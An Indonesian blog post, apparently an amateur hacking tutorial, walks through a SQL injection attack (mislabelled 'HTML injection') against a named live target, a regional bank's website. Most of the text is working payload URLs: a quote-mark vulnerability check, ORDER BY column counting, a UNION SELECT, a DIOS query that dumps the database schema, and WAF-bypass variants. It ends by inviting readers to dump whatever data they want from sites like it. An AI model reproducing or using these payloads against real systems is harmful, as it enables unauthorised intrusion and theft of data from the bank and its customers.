Cara Mengunakan Html Injection

Akmal
Januari 01, 2020

Cara Mengunakan Html Injection

 

ArtikelkuNEWS- Kali ini admin bakal ngasih cara html injection. sebenernya admin agak ragu sih ini html injection atau sql injection karena caranya sama kayak sql injection bedanya cuman ini di html doang.ha ha ha :v
Nah tapi setelah gua tanya ke beberapa temen gua mereka ngejawabnya ini adalah html injection jadi we simpulin aja ini html injection jadi kalo admin salah mohon di maafkan.

Lankah Pertama:

Ok disini admin udah punya live target
Target:http://bankbengkulu.co.id/post-pt-bank-pembangunan-daerah-bengkulu-kcp-kaur-selatan-pindah-alamat-kantor.html

Bank Bengkulu Ngery nih, aha ha ha 

 

 

Lankah Kedua:

Seperti biasa untuk mengecek web nya vuln apa engga kita masukin ' di webnya disini di masukinnya di sebelum .html
Contoh:http://bankbengkulu.co.id/post-pt-bank-pembangunan-daerah-bengkulu-kcp-kaur-selatan-pindah-alamat-kantor'.html 

 

Nah seperti yang kalian lihat bahwa tampilannya berubah yang menandakan web tersebut ada kemungkinan bisa kita eksekusi
Sekarang lanjut kita untuk menghitung collumnsnya caranya masukin +order+by+angka--+ di webnya.


Di web terbut collumnsnya ada 16
Ex:http://bankbengkulu.co.id/post-pt-bank-pembangunan-daerah-bengkulu-kcp-kaur-selatan-pindah-alamat-kantor'+order+by+16--+.html

Sekarang lanjut kita nyari angka ajaibnya caranya tinggal hapus +order+by+16--+ nya ganti sama +union+select+jumlah collumns--+ dan di sebelum kata kantor nya tambahin -
ex:http://bankbengkulu.co.id/post-pt-bank-pembangunan-daerah-bengkulu-kcp-kaur-selatan-pindah-alamat--kantor'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+.html

 

Tu kan angka ajaibnya yaitu 4 sekarang lanjut kita pasang diosnya di angka ajaibnya
Dios:(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))

Ex:http://bankbengkulu.co.id/post-pt-bank-pembangunan-daerah-bengkulu-kcp-kaur-selatan-pindah-alamat--kantor'+union+select+1,2,3,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),5,6,7,8,9,10,11,12,13,14,15,16--+.html

 

Yahh web nya forbidden:( gimana dong? pulang yuk ga bakal bisa ini:(
Essstt bercanda bisa kok tinggal kita bypass waff aja beres
caranya:
- ganti +union+select+ nya sama +/*!50000union*/+/*!50000select*/+
- ganti diosnya sama dios bypass waf

/*!50000make_set*/(6,@:=0x0a,(select(1)/*!50000from*/(/*!50000information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!50000table_name*/,/*!50000column_name*/)),@)

Ex:http://bankbengkulu.co.id/post-pt-bank-pembangunan-daerah-bengkulu-kcp-kaur-selatan-pindah-alamat--kantor'+/*!50000union*/+/*!50000select*/+1,2,3,/*!50000make_set*/(6,@:=0x0a,(select(1)/*!50000from*/(/*!50000information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!50000table_name*/,/*!50000column_name*/)),@),5,6,7,8,9,10,11,12,13,14,15,16--+.html

 

 

Dan Selesai Mudah bukan? ha ha ha,Muncul kan table nya sekarang bebas deh kalian tinggal dump data yang kalian inginkan

Nb:poc ini sangat bagus untuk kalian yang ingin menjadi pemburu sertifikat bssn karena banyak sekali bug seperti ini di website website indonesia dan masih fresh alias belum di laporin ke bssn